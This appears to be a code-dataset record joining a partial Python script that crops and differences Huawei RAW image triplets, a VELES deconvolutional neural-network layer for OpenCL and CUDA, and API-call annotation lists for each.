gt, ab, f outputs: gt, ab, f, fo, m""" raws=[imread(x) for x in inputs] w_start, h_start,w_end, h_end =[int(x) for x in bds[:4]] # print(h_start, w_start, h_end, w_end) h_offset = (h_end-h_start)//32 * 32 w_offset = (w_end-w_start)//32 * 32 rawsc=[x[h_start:h_start+h_offset,w_start:w_start+w_offset] for x in raws] for out,raw in zip(outputs[:3],rawsc): imwrite(out,raw) fo = np.maximum(rawsc[2].astype(np.int32) - rawsc[1].astype(np.int32),0).astype(np.uint16) imwrite(outputs[3],fo) tran = np.maximum(rawsc[1].astype(np.int32) - rawsc[0].astype(np.int32),0).astype(np.uint16) imwrite(outputs[4],tran) def batch5rawc(root:str,processes=16): df=get_trip(root) dfi=df.applymap(lambda x:osp.join(root,'raw',x+'.dng')).to_numpy() out_dirs=[osp.join(root,'rawc','origin'),osp.join(root,'rawc','derived')] for d in out_dirs: mkdir(d) dfo=df.applymap(lambda x:osp.join(out_dirs[0],x+'.png')) dfo[["fo","m"]]=df[["f","ab"]].applymap( lambda x:osp.join(out_dirs[1],x+'.png')) dfo=dfo.to_numpy() dfbd=(pd.read_csv(osp.join(root,root+'.csv'))[["w1","h1","w2","h2"]]).to_numpy() # get5rawc(dfi[0],dfo[0],dfbd[0]) # return with Pool(16) as p: ares = p.starmap_async(get5rawc, zip(dfi,dfo,dfbd)) ares.wait() def main3(): for subdir in [ 'huawei_20200918', 'huawei_20200910', 'huawei_20200826']: batch5rawc(subdir) batch_rawtb(subdir) five(subdir,'rawc') def main(): sizes=[] for root in [ 'huawei_20200918', 'huawei_20200910', 'huawei_20200826']: root=osp.join(root,'rgbc','origin') ls=os.listdir(root) for f in ls: sizes.append(cv.imread(osp.join(root,f)).shape) sizes=np.array(sizes) # np.savez('size.npz',sizes) print(np.histogram(sizes[:,0])) print(np.histogram(sizes[:,1])) def main2(): for subdir in ['huawei_20200918', 'huawei_20200910', 'huawei_20200826', 'huawei_20200909', 'huawei_20200917']: # for subdir in ['huawei_20200917']: # batch5rgb(subdir) # batch_crop_rgb(subdir) # batch_rgbtb(subdir) # five(subdir,'rgbc') # concat_bbs(subdir) print(subdir) df=get_trip(subdir) print(len(df)) if __name__ == '__main__': main2() # dfi=["huawei_20200917/raw/IMG_20200917_153703.dng", # "huawei_20200917/raw/IMG_20200917_153710.dng", # "huawei_20200917/raw/IMG_20200917_153724.dng"] # dfo=["huawei_20200917/rgb/origin/IMG_20200917_153703.jpg", # "huawei_20200917/rgb/origin/IMG_20200917_153710.jpg", # "huawei_20200917/rgb/origin/IMG_20200917_153724.jpg", # "huawei_20200917/rgb/derived/IMG_20200917_153724.jpg", # "huawei_20200917/rgb/derived/IMG_20200917_153710.jpg"] # get5rgb(dfi,dfo) # a=rawpy.imread("huawei_20200917/raw/IMG_20200917_153703.dng").raw_image_visible.shape # a=imread("huawei_20200917/raw/IMG_20200917_153703.dng").shape # print(a)
[ "pprint.pformat", "numpy.histogram", "utils.io.imwrite", "os.path.join", "utils.io.raw_read_rgb", "utils.io.imread", "cv2.imwrite", "utils.io.check_exif", "utils.path.mkdir", "rawpy.imread", "pandas.concat", "cv2.resize", "utils.io.get_exif", "multiprocessing.Pool", "utils.io.parse_tripr", "os.listdir", "cv2.imread", "numpy.array", "utils.io.get_trip" ]
[((1023, 1041), 'utils.io.check_exif', 'check_exif', (['inputs'], {}), '(inputs)\n', (1033, 1041), False, 'from utils.io import imread, imwrite, get_exif, get_trip, raw2rgbg, mdwrite, raw_read_rgb, check_exif, extract_exif\n'), ((1597, 1620), 'utils.io.imwrite', 'imwrite', (['outputs[3]', 'fo'], {}), '(outputs[3], fo)\n', (1604, 1620), False, 'from utils.io import imread, imwrite, get_exif, get_trip, raw2rgbg, mdwrite, raw_read_rgb, check_exif, extract_exif\n'), ((2024, 2049), 'utils.io.imwrite', 'imwrite', (['outputs[4]', 'tran'], {}), '(outputs[4], tran)\n', (2031, 2049), False, 'from utils.io import imread, imwrite, get_exif, get_trip, raw2rgbg, mdwrite, raw_read_rgb, check_exif, extract_exif\n'), ((2095, 2109), 'utils.io.get_trip', 'get_trip', (['root'], {}), '(root)\n', (2103, 2109), False, 'from utils.io import imread, imwrite, get_exif, get_trip, raw2rgbg, mdwrite, raw_read_rgb, check_exif, extract_exif\n'), ((2752, 2785), 'pandas.concat', 'pd.concat', (['[dftrip, dfbd]'], {'axis': '(1)'}), '([dftrip, dfbd], axis=1)\n', (2761, 2785), True, 'import pandas as pd\n'), ((2930, 2944), 'utils.io.get_exif', 'get_exif', (['path'], {}), '(path)\n', (2938, 2944), False, 'from utils.io import imread, imwrite, get_exif, get_trip, raw2rgbg, mdwrite, raw_read_rgb, check_exif, extract_exif\n'), ((3308, 3322), 'utils.io.get_trip', 'get_trip', (['root'], {}), '(root)\n', (3316, 3322), False, 'from utils.io import imread, imwrite, get_exif, get_trip, raw2rgbg, mdwrite, raw_read_rgb, check_exif, extract_exif\n'), ((4033, 4047), 'utils.io.get_trip', 'get_trip', (['root'], {}), '(root)\n', (4041, 4047), False, 'from utils.io import imread, imwrite, get_exif, get_trip, raw2rgbg, mdwrite, raw_read_rgb, check_exif, extract_exif\n'), ((4822, 4836), 'utils.io.get_trip', 'get_trip', (['root'], {}), '(root)\n', (4830, 4836), False, 'from utils.io import imread, imwrite, get_exif, get_trip, raw2rgbg, mdwrite, raw_read_rgb, check_exif, extract_exif\n'), ((5888, 5902), 'utils.io.get_trip', 'get_trip', (['root'], {}), '(root)\n', (5896, 5902), False, 'from utils.io import imread, imwrite, get_exif, get_trip, raw2rgbg, mdwrite, raw_read_rgb, check_exif, extract_exif\n'), ((7166, 7189), 'utils.io.imwrite', 'imwrite', (['outputs[3]', 'fo'], {}), '(outputs[3], fo)\n', (7173, 7189), False, 'from utils.io import imread, imwrite, get_exif, get_trip, raw2rgbg, mdwrite, raw_read_rgb, check_exif, extract_exif\n'), ((7304, 7329), 'utils.io.imwrite', 'imwrite', (['outputs[4]', 'tran'], {}), '(outputs[4], tran)\n', (7311, 7329), False, 'from utils.io import imread, imwrite, get_exif, get_trip, raw2rgbg, mdwrite, raw_read_rgb, check_exif, extract_exif\n'), ((7381, 7395), 'utils.io.get_trip', 'get_trip', (['root'], {}), '(root)\n', (7389, 7395), False, 'from utils.io import imread, imwrite, get_exif, get_trip, raw2rgbg, mdwrite, raw_read_rgb, check_exif, extract_exif\n'), ((8454, 8469), 'numpy.array', 'np.array', (['sizes'], {}), '(sizes)\n', (8462, 8469), True, 'import numpy as np\n'), ((807, 832), 'utils.io.parse_tripr', 'parse_tripr', (['input_folder'], {}), '(input_folder)\n', (818, 832), False, 'from utils.io import parse_tripr\n'), ((1052, 1067), 'utils.io.raw_read_rgb', 'raw_read_rgb', (['x'], {}), '(x)\n', (1064, 1067), False, 'from utils.io import imread, imwrite, get_exif, get_trip, raw2rgbg, mdwrite, raw_read_rgb, check_exif, extract_exif\n'), ((1160, 1177), 'utils.io.imwrite', 'imwrite', (['out', 'rgb'], {}), '(out, rgb)\n', (1167, 1177), False, 'from utils.io import imread, imwrite, get_exif, get_trip, raw2rgbg, mdwrite, raw_read_rgb, check_exif, extract_exif\n'), ((1205, 1220), 'rawpy.imread', 'rawpy.imread', (['x'], {}), '(x)\n', (1217, 1220), False, 'import rawpy\n'), ((1631, 1646), 'rawpy.imread', 'rawpy.imread', (['x'], {}), '(x)\n', (1643, 1646), False, 'import rawpy\n'), ((2195, 2226), 'os.path.join', 'osp.join', (['root', '"""rgb"""', '"""origin"""'], {}), "(root, 'rgb', 'origin')\n", (2203, 2226), True, 'import os.path as osp\n'), ((2225, 2257), 'os.path.join', 'osp.join', (['root', '"""rgb"""', '"""derived"""'], {}), "(root, 'rgb', 'derived')\n", (2233, 2257), True, 'import os.path as osp\n'), ((2288, 2296), 'utils.path.mkdir', 'mkdir', (['d'], {}), '(d)\n', (2293, 2296), False, 'from utils.path import be, bj, mkdir\n'), ((2532, 2540), 'multiprocessing.Pool', 'Pool', (['(16)'], {}), '(16)\n', (2536, 2540), False, 'from multiprocessing import Pool, RawArray\n'), ((2665, 2694), 'os.path.join', 'osp.join', (['root', "(root + '.csv')"], {}), "(root, root + '.csv')\n", (2673, 2694), True, 'import os.path as osp\n'), ((2716, 2742), 'os.path.join', 'osp.join', (['root', '"""trip.csv"""'], {}), "(root, 'trip.csv')\n", (2724, 2742), True, 'import os.path as osp\n'), ((2800, 2824), 'os.path.join', 'osp.join', (['root', '"""bb.csv"""'], {}), "(root, 'bb.csv')\n", (2808, 2824), True, 'import os.path as osp\n'), ((3102, 3114), 'cv2.imread', 'cv.imread', (['i'], {}), '(i)\n', (3111, 3114), True, 'import cv2 as cv\n'), ((3336, 3365), 'os.path.join', 'osp.join', (['root', 'fmt', '"""origin"""'], {}), "(root, fmt, 'origin')\n", (3344, 3365), True, 'import os.path as osp\n'), ((3364, 3394), 'os.path.join', 'osp.join', (['root', 'fmt', '"""derived"""'], {}), "(root, fmt, 'derived')\n", (3372, 3394), True, 'import os.path as osp\n'), ((3589, 3631), 'os.path.join', 'osp.join', (['root', 'fmt', '"""thumbnail"""', '"""origin"""'], {}), "(root, fmt, 'thumbnail', 'origin')\n", (3597, 3631), True, 'import os.path as osp\n'), ((3629, 3672), 'os.path.join', 'osp.join', (['root', 'fmt', '"""thumbnail"""', '"""derived"""'], {}), "(root, fmt, 'thumbnail', 'derived')\n", (3637, 3672), True, 'import os.path as osp\n'), ((3702, 3710), 'utils.path.mkdir', 'mkdir', (['d'], {}), '(d)\n', (3707, 3710), False, 'from utils.path import be, bj, mkdir\n'), ((3903, 3911), 'multiprocessing.Pool', 'Pool', (['(16)'], {}), '(16)\n', (3907, 3911), False, 'from multiprocessing import Pool, RawArray\n'), ((4062, 4103), 'os.path.join', 'osp.join', (['imformat', '"""thumbnail"""', '"""origin"""'], {}), "(imformat, 'thumbnail', 'origin')\n", (4070, 4103), True, 'import os.path as osp\n'), ((4102, 4144), 'os.path.join', 'osp.join', (['imformat', '"""thumbnail"""', '"""derived"""'], {}), "(imformat, 'thumbnail', 'derived')\n", (4110, 4144), True, 'import os.path as osp\n'), ((4341, 4377), 'os.path.join', 'osp.join', (['root', 'f"""five{imformat}.md"""'], {}), "(root, f'five{imformat}.md')\n", (4349, 4377), True, 'import os.path as osp\n'), ((4650, 4662), 'cv2.imread', 'cv.imread', (['i'], {}), '(i)\n', (4659, 4662), True, 'import cv2 as cv\n'), ((4719, 4793), 'cv2.imwrite', 'cv.imwrite', (['o', 'img[h_start:h_start + h_offset, w_start:w_start + w_offset]'], {}), '(o, img[h_start:h_start + h_offset, w_start:w_start + w_offset])\n', (4729, 4793), True, 'import cv2 as cv\n'), ((4850, 4881), 'os.path.join', 'osp.join', (['root', '"""rgb"""', '"""origin"""'], {}), "(root, 'rgb', 'origin')\n", (4858, 4881), True, 'import os.path as osp\n'), ((4880, 4912), 'os.path.join', 'osp.join', (['root', '"""rgb"""', '"""derived"""'], {}), "(root, 'rgb', 'derived')\n", (4888, 4912), True, 'import os.path as osp\n'), ((5107, 5139), 'os.path.join', 'osp.join', (['root', '"""rgbc"""', '"""origin"""'], {}), "(root, 'rgbc', 'origin')\n", (5115, 5139), True, 'import os.path as osp\n'), ((5138, 5171), 'os.path.join', 'osp.join', (['root', '"""rgbc"""', '"""derived"""'], {}), "(root, 'rgbc', 'derived')\n", (5146, 5171), True, 'import os.path as osp\n'), ((5202, 5210), 'utils.path.mkdir', 'mkdir', (['d'], {}), '(d)\n', (5207, 5210), False, 'from utils.path import be, bj, mkdir\n'), ((5563, 5571), 'multiprocessing.Pool', 'Pool', (['(16)'], {}), '(16)\n', (5567, 5571), False, 'from multiprocessing import Pool, RawArray\n'), ((5842, 5857), 'utils.io.imwrite', 'imwrite', (['o', 'img'], {}), '(o, img)\n', (5849, 5857), False, 'from utils.io import imread, imwrite, get_exif, get_trip, raw2rgbg, mdwrite, raw_read_rgb, check_exif, extract_exif\n'), ((5916, 5948), 'os.path.join', 'osp.join', (['root', '"""rawc"""', '"""origin"""'], {}), "(root, 'rawc', 'origin')\n", (5924, 5948), True, 'import os.path as osp\n'), ((5947, 5980), 'os.path.join', 'osp.join', (['root', '"""rawc"""', '"""derived"""'], {}), "(root, 'rawc', 'derived')\n", (5955, 5980), True, 'import os.path as osp\n'), ((6175, 6220), 'os.path.join', 'osp.join', (['root', '"""rawc"""', '"""thumbnail"""', '"""origin"""'], {}), "(root, 'rawc', 'thumbnail', 'origin')\n", (6183, 6220), True, 'import os.path as osp\n'), ((6218, 6264), 'os.path.join', 'osp.join', (['root', '"""rawc"""', '"""thumbnail"""', '"""derived"""'], {}), "(root, 'rawc', 'thumbnail', 'derived')\n", (6226, 6264), True, 'import os.path as osp\n'), ((6294, 6302), 'utils.path.mkdir', 'mkdir', (['d'], {}), '(d)\n', (6299, 6302), False, 'from utils.path import be, bj, mkdir\n'), ((6495, 6503), 'multiprocessing.Pool', 'Pool', (['(16)'], {}), '(16)\n', (6499, 6503), False, 'from multiprocessing import Pool, RawArray\n'), ((6694, 6703), 'utils.io.imread', 'imread', (['x'], {}), '(x)\n', (6700, 6703), False, 'from utils.io import imread, imwrite, get_exif, get_trip, raw2rgbg, mdwrite, raw_read_rgb, check_exif, extract_exif\n'), ((7037, 7054), 'utils.io.imwrite', 'imwrite', (['out', 'raw'], {}), '(out, raw)\n', (7044, 7054), False, 'from utils.io import imread, imwrite, get_exif, get_trip, raw2rgbg, mdwrite, raw_read_rgb, check_exif, extract_exif\n'), ((7481, 7513), 'os.path.join', 'osp.join', (['root', '"""rawc"""', '"""origin"""'], {}), "(root, 'rawc', 'origin')\n", (7489, 7513), True, 'import os.path as osp\n'), ((7512, 7545), 'os.path.join', 'osp.join', (['root', '"""rawc"""', '"""derived"""'], {}), "(root, 'rawc', 'derived')\n", (7520, 7545), True, 'import os.path as osp\n'), ((7576, 7584), 'utils.path.mkdir', 'mkdir', (['d'], {}), '(d)\n', (7581, 7584), False, 'from utils.path import be, bj, mkdir\n'), ((7913, 7921), 'multiprocessing.Pool', 'Pool', (['(16)'], {}), '(16)\n', (7917, 7921), False, 'from multiprocessing import Pool, RawArray\n'), ((8304, 8336), 'os.path.join', 'osp.join', (['root', '"""rgbc"""', '"""origin"""'], {}), "(root, 'rgbc', 'origin')\n", (8312, 8336), True, 'import os.path as osp\n'), ((8346, 8362), 'os.listdir', 'os.listdir', (['root'], {}), '(root)\n', (8356, 8362), False, 'import os\n'), ((8513, 8538), 'numpy.histogram', 'np.histogram', (['sizes[:, 0]'], {}), '(sizes[:, 0])\n', (8525, 8538), True, 'import numpy as np\n'), ((8549, 8574), 'numpy.histogram', 'np.histogram', (['sizes[:, 1]'], {}), '(sizes[:, 1])\n', (8561, 8574), True, 'import numpy as np\n'), ((8929, 8945), 'utils.io.get_trip', 'get_trip', (['subdir'], {}), '(subdir)\n', (8937, 8945), False, 'from utils.io import imread, imwrite, get_exif, get_trip, raw2rgbg, mdwrite, raw_read_rgb, check_exif, extract_exif\n'), ((851, 885), 'os.path.join', 'osp.join', (['input_folder', '"""trip.csv"""'], {}), "(input_folder, 'trip.csv')\n", (859, 885), True, 'import os.path as osp\n'), ((2326, 2359), 'os.path.join', 'osp.join', (['out_dirs[0]', "(x + '.jpg')"], {}), "(out_dirs[0], x + '.jpg')\n", (2334, 2359), True, 'import os.path as osp\n'), ((2424, 2457), 'os.path.join', 'osp.join', (['out_dirs[1]', "(x + '.jpg')"], {}), "(out_dirs[1], x + '.jpg')\n", (2432, 2457), True, 'import os.path as osp\n'), ((2999, 3009), 'pprint.pformat', 'pformat', (['a'], {}), '(a)\n', (3006, 3009), False, 'from pprint import pformat\n'), ((3236, 3267), 'cv2.resize', 'cv.resize', (['im', 'None'], {'fx': 'r', 'fy': 'r'}), '(im, None, fx=r, fy=r)\n', (3245, 3267), True, 'import cv2 as cv\n'), ((3423, 3455), 'os.path.join', 'osp.join', (['in_dirs[0]', "(x + '.jpg')"], {}), "(in_dirs[0], x + '.jpg')\n", (3431, 3455), True, 'import os.path as osp\n'), ((3520, 3552), 'os.path.join', 'osp.join', (['in_dirs[1]', "(x + '.jpg')"], {}), "(in_dirs[1], x + '.jpg')\n", (3528, 3552), True, 'import os.path as osp\n'), ((3740, 3773), 'os.path.join', 'osp.join', (['out_dirs[0]', "(x + '.jpg')"], {}), "(out_dirs[0], x + '.jpg')\n", (3748, 3773), True, 'import os.path as osp\n'), ((3838, 3871), 'os.path.join', 'osp.join', (['out_dirs[1]', "(x + '.jpg')"], {}), "(out_dirs[1], x + '.jpg')\n", (3846, 3871), True, 'import os.path as osp\n'), ((4941, 4973), 'os.path.join', 'osp.join', (['in_dirs[0]', "(x + '.jpg')"], {}), "(in_dirs[0], x + '.jpg')\n", (4949, 4973), True, 'import os.path as osp\n'), ((5038, 5070), 'os.path.join', 'osp.join', (['in_dirs[1]', "(x + '.jpg')"], {}), "(in_dirs[1], x + '.jpg')\n", (5046, 5070), True, 'import os.path as osp\n'), ((5240, 5273), 'os.path.join', 'osp.join', (['out_dirs[0]', "(x + '.jpg')"], {}), "(out_dirs[0], x + '.jpg')\n", (5248, 5273), True, 'import os.path as osp\n'), ((5338, 5371), 'os.path.join', 'osp.join', (['out_dirs[1]', "(x + '.jpg')"], {}), "(out_dirs[1], x + '.jpg')\n", (5346, 5371), True, 'import os.path as osp\n'), ((6009, 6041), 'os.path.join', 'osp.join', (['in_dirs[0]', "(x + '.png')"], {}), "(in_dirs[0], x + '.png')\n", (6017, 6041), True, 'import os.path as osp\n'), ((6106, 6138), 'os.path.join', 'osp.join', (['in_dirs[1]', "(x + '.png')"], {}), "(in_dirs[1], x + '.png')\n", (6114, 6138), True, 'import os.path as osp\n'), ((6332, 6365), 'os.path.join', 'osp.join', (['out_dirs[0]', "(x + '.jpg')"], {}), "(out_dirs[0], x + '.jpg')\n", (6340, 6365), True, 'import os.path as osp\n'), ((6430, 6463), 'os.path.join', 'osp.join', (['out_dirs[1]', "(x + '.jpg')"], {}), "(out_dirs[1], x + '.jpg')\n", (6438, 6463), True, 'import os.path as osp\n'), ((7614, 7647), 'os.path.join', 'osp.join', (['out_dirs[0]', "(x + '.png')"], {}), "(out_dirs[0], x + '.png')\n", (7622, 7647), True, 'import os.path as osp\n'), ((7712, 7745), 'os.path.join', 'osp.join', (['out_dirs[1]', "(x + '.png')"], {}), "(out_dirs[1], x + '.png')\n", (7720, 7745), True, 'import os.path as osp\n'), ((5732, 5741), 'utils.io.imread', 'imread', (['x'], {}), '(x)\n', (5738, 5741), False, 'from utils.io import imread, imwrite, get_exif, get_trip, raw2rgbg, mdwrite, raw_read_rgb, check_exif, extract_exif\n'), ((2139, 2172), 'os.path.join', 'osp.join', (['root', '"""raw"""', "(x + '.dng')"], {}), "(root, 'raw', x + '.dng')\n", (2147, 2172), True, 'import os.path as osp\n'), ((4183, 4216), 'os.path.join', 'osp.join', (['out_dirs[0]', "(x + '.jpg')"], {}), "(out_dirs[0], x + '.jpg')\n", (4191, 4216), True, 'import os.path as osp\n'), ((4294, 4327), 'os.path.join', 'osp.join', (['out_dirs[1]', "(x + '.jpg')"], {}), "(out_dirs[1], x + '.jpg')\n", (4302, 4327), True, 'import os.path as osp\n'), ((5416, 5445), 'os.path.join', 'osp.join', (['root', "(root + '.csv')"], {}), "(root, root + '.csv')\n", (5424, 5445), True, 'import os.path as osp\n'), ((7425, 7458), 'os.path.join', 'osp.join', (['root', '"""raw"""', "(x + '.dng')"], {}), "(root, 'raw', x + '.dng')\n", (7433, 7458), True, 'import os.path as osp\n'), ((7789, 7818), 'os.path.join', 'osp.join', (['root', "(root + '.csv')"], {}), "(root, root + '.csv')\n", (7797, 7818), True, 'import os.path as osp\n'), ((8419, 8436), 'os.path.join', 'osp.join', (['root', 'f'], {}), '(root, f)\n', (8427, 8436), True, 'import os.path as osp\n')]
# -*- coding: utf-8 -*- """ .. invisible: _ _ _____ _ _____ _____ | | | | ___| | | ___/ ___| | | | | |__ | | | |__ \ `--. | | | | __|| | | __| `--. \ \ \_/ / |___| |___| |___/\__/ / \___/\____/\_____|____/\____/ Created on Jul 1, 2014 Deconvolutional layer. ███████████████████████████████████████████████████████████████████████████████ Licensed to the Apache Software Foundation (ASF) under one or more contributor license agreements. See the NOTICE file distributed with this work for additional information regarding copyright ownership. The ASF licenses this file to you under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. ███████████████████████████████████████████████████████████████████████████████ """ from __future__ import division import cuda4py.blas as cublas import numpy from zope.interface import implementer from veles.config import root from veles.compat import from_none from veles.accelerated_units import IOpenCLUnit, ICUDAUnit, INumpyUnit from veles.memory import Array import veles.ocl_blas as ocl_blas from veles.znicz.conv import ConvolutionalBase import veles.znicz.nn_units as nn_units from veles.distributable import TriviallyDistributable @implementer(IOpenCLUnit, ICUDAUnit, INumpyUnit) class Deconv(TriviallyDistributable, ConvolutionalBase, nn_units.Forward): # TriviallyDistributable overrides nn_units.Forward IDistributable """Deconvolutional layer for simple convolutional layer with linear activation and without bias. Must be assigned before initialize(): input weights output_shape_source Updates after run(): output Creates within initialize(): output Attributes: input: input as batch of multichannel interleaved images. output: output as batch of multichannel interleaved images. weights: matrix of weights. output_shape_source: Array to get output shape from. n_kernels: number of convolutional kernels in the corresponding convolutional layer. kx: kernel width. ky: kernel height. sliding: tuple of kernel sliding (by x-axis, by y-axis), kx, ky MUST be a multiple of sliding to avoid irregularities. padding: tuple of virtual sample padding (left, top, right, bottom), will be computed automatically based on sliding. weights_transposed: assume weights matrix as a transposed one. unsafe_padding: flag to enable unsafe padding and/or sliding. """ MAPPING = {"deconv"} @staticmethod def compute_padding(sx, sy, kx, ky, sliding): """Computes required padding. """ return (kx - sliding[1], ky - sliding[0], kx - sx % sliding[1] if sx % sliding[1] != 0 else kx - sliding[1], ky - sy % sliding[0] if sy % sliding[0] != 0 else ky - sliding[0]) @staticmethod def check_padding_is_safe(kx, ky, sliding): if sliding[0] > (ky >> 1) or sliding[1] > (kx >> 1): raise ValueError( "sliding should not be greater than half of the kernel size") if kx % sliding[0] != 0 or kx % sliding[1] != 0: raise ValueError( "Kernel size should be multiple of sliding") def __init__(self, workflow, **kwargs): super(Deconv, self).__init__(workflow, **kwargs) self.unsafe_padding = kwargs.get("unsafe_padding", False) self.hits = Array() self.krn_clear_output_ = None self._global_size = None self._local_size = None del self.bias self.demand("n_kernels", "kx", "ky", "padding", "sliding", "input", "weights", "output_shape_source") def init_unpickled(self): super(Deconv, self).init_unpickled() self.sources_["deconv/forward"] = {} def initialize(self, device, **kwargs): super(Deconv, self).initialize(device, **kwargs) self._dtype = self.input.dtype self.weights_shape = (tuple(reversed(self.weights.shape)) if self.weights_transposed else self.weights.shape) if hasattr(self, "bias"): raise ValueError("bias should not be set") if (len(self.input.shape) != 4 or self.input.shape[3] != self.n_kernels): raise ValueError("Incorrectly shaped input encountered") if (len(self.weights_shape) != 2 or self.weights_shape[0] != self.n_kernels or self.weights_shape[1] % (self.kx * self.ky) != 0): raise ValueError("Incorrectly shaped weights encountered") output_shape = tuple(self.output_shape_source.shape) if len(output_shape) != 4: raise ValueError("Incorrect output_shape_source shape") if output_shape[0] != self.input.shape[0]: raise ValueError( "output_shape_source.shape[0] != input.shape[0]") try: self.check_padding_is_safe(self.kx, self.ky, self.sliding) except ValueError as e: if not self.unsafe_padding: raise from_none(e) self.warning("The padding will be unsafe") self._create_hits(output_shape) padding = Deconv.compute_padding( output_shape[2], output_shape[1], self.kx, self.ky, self.sliding) if self.padding is None: # pylint: disable=E0203 self.padding = padding elif self.padding != padding: if not self.unsafe_padding: raise ValueError( "Expected padding %s but got %s" % (padding, self.padding)) self._create_hits(output_shape) if self.output: assert self.output.shape[1:] == output_shape[1:] if not self.output or self.output.shape[0] != output_shape[0]: self.output.reset(numpy.zeros(output_shape, dtype=self._dtype)) self._output_shape = output_shape self._sy, self._sx, self._n_channels = self._output_shape[1:] self._kernel_size = self.kx * self.ky * self._n_channels self._kernel_app_per_image = self.input.sample_size // self.n_kernels self._kernel_app_total = (self._kernel_app_per_image * self.input.shape[0]) self.init_vectors(self.input, self.weights, self.output, self.hits) def _create_hits(self, output_shape): if not self.hits: self.hits.reset( numpy.zeros(output_shape, dtype=numpy.int32)) else: assert self.hits.size == int(numpy.prod(output_shape)) def _gpu_init(self, blas_class): defines = { "USE_ATOMICS": 1, "WEIGHTS_TRANSPOSED": int(self.weights_transposed), "BATCH": self._output_shape[0], "SX": self._sx, "SY": self._sy, "N_CHANNELS": self._n_channels, "KX": self.kx, "KY": self.ky, "N_KERNELS": self.n_kernels, "PAD_LEFT": self.padding[0], "PAD_TOP": self.padding[1], "PAD_RIGHT": self.padding[2], "PAD_BOTTOM": self.padding[3], "SLIDE_X": self.sliding[0], "SLIDE_Y": self.sliding[1], "USE_HITS": int(bool(self.hits)), "DECONV_MODE": int(bool(self.hits)) + 1, "OUTPUT_SIZE": self.output.size } self.build_program( defines, "%s/%s_%d_%dx%dx%d_%dx%d_%d" % ( root.common.dirs.cache, self.__class__.__name__, self.input.shape[0], self._output_shape[2], self._output_shape[1], self._output_shape[3], self.kx, self.ky, self.n_kernels), dtype=self._dtype) self.krn_pack_ = self.get_kernel("DirectPack") unpack_bytes = (self._kernel_app_per_image * self.unpack_size * self._kernel_size * self.input.itemsize) self.device.request_temp_buffer(unpack_bytes) if self.hits: self.krn_pack_.set_arg(3, self.hits.devmem) self.krn_apply_hits_ = self.get_kernel("apply_hits") self.krn_apply_hits_.set_args(self.output.devmem, self.hits.devmem) self.gemm_ = blas_class.gemm(self._dtype) self.np_one = numpy.ones(1, dtype=self._dtype) self.np_zero = numpy.zeros(1, dtype=self._dtype) self._const_i = numpy.zeros(1, dtype=numpy.int64) def ocl_init(self): ocl_blas.OCLBLAS.attach_to_device(self.device) self._gpu_init(ocl_blas.OCLBLAS) self._global_size_pack = lambda size: (size,) self._local_size_pack = None if self.hits: self.krn_clear_hits_ = self.get_kernel("clear_hits") self.krn_clear_hits_.set_arg(0, self.hits.devmem) self._global_size_hits = (self.output.size,) self._local_size_hits = None self.krn_clear_output_ = self.get_kernel("clear_output") self.krn_clear_output_.set_arg(0, self.output.devmem) self._clear_output = lambda: ( self.execute_kernel((self.output.size,), None, self.krn_clear_output_)) self._clear_hits = lambda: ( self.execute_kernel((self.hits.size,), None, self.krn_clear_hits_)) self._process_subblock = self._ocl_process_subblock self.krn_pack_.set_arg(1, self.output.devmem) def cuda_init(self): self._gpu_init(cublas.CUBLAS) block_size = self.device.suggest_block_size(self.krn_pack_) self._global_size_pack = ( lambda size: (int(numpy.ceil(size / block_size)), 1, 1)) self._local_size_pack = (block_size, 1, 1) if self.hits: block_size = self.device.suggest_block_size(self.krn_apply_hits_) self._global_size_hits = ( int(numpy.ceil(self.output.size / block_size)), 1, 1) self._local_size_hits = (block_size, 1, 1) self._clear_output = lambda: self.output.devmem.memset32_async() self._clear_hits = lambda: self.hits.devmem.memset32_async() self._process_subblock = self._cuda_process_subblock def ocl_run(self): self.gpu_run() def cuda_run(self): self.gpu_run() def gpu_run(self): self.unmap_vectors(self.output, self.input, self.weights) unpack_data = self.device.get_temp_buffer() self._clear_output() if self.hits: self.hits.unmap() self._clear_hits() batch_size = self.output.shape[0] for i in range(0, batch_size, self.unpack_size): self._process_subblock(i, min(batch_size - i, self.unpack_size), unpack_data) if self.hits: self.execute_kernel(self._global_size_hits, self._local_size_hits, self.krn_apply_hits_) def _cuda_process_subblock(self, start_image, image_count, unpack_data): output_offs = (start_image * self.input.sample_size * self.input.itemsize) unpack_side = self._kernel_app_per_image * image_count self.gemm_( self.device.blas, cublas.CUBLAS_OP_T if self.weights_transposed else cublas.CUBLAS_OP_N, cublas.CUBLAS_OP_N, self._kernel_size, unpack_side, self.weights_shape[0], self.np_one, self.weights.devmem, int(self.input.devmem) + output_offs, self.np_zero, unpack_data) self.krn_pack_.set_arg(0, unpack_data) self.krn_pack_.set_arg( 1, int(self.output.devmem) + start_image * self.output.sample_size * self.output.itemsize) limit = unpack_side * self._kernel_size self._const_i[0] = limit self.krn_pack_.set_arg(2, self._const_i) self.execute_kernel(self._global_size_pack(limit), self._local_size_pack, self.krn_pack_) def _ocl_process_subblock(self, start_image, image_count, unpack_data): output_offs = start_image * self.input.sample_size unpack_side = self._kernel_app_per_image * image_count self.gemm_( self.device.blas, cublas.CUBLAS_OP_T if self.weights_transposed else cublas.CUBLAS_OP_N, cublas.CUBLAS_OP_N, self._kernel_size, unpack_side, self.weights_shape[0], self.np_one, self.weights.devmem, self.input.devmem, self.np_zero, unpack_data, offsetB=output_offs) self.krn_pack_.set_arg(0, unpack_data) self._const_i[0] = start_image * self.output.sample_size self.krn_pack_.set_arg(2, self._const_i) limit = unpack_side * self._kernel_size self.execute_kernel(self._global_size_pack(limit), self._local_size_pack, self.krn_pack_) def numpy_run(self): raise NotImplementedError()
[ "numpy.ceil", "veles.ocl_blas.OCLBLAS.attach_to_device", "zope.interface.implementer", "numpy.zeros", "numpy.ones", "veles.compat.from_none", "veles.memory.Array", "numpy.prod" ]
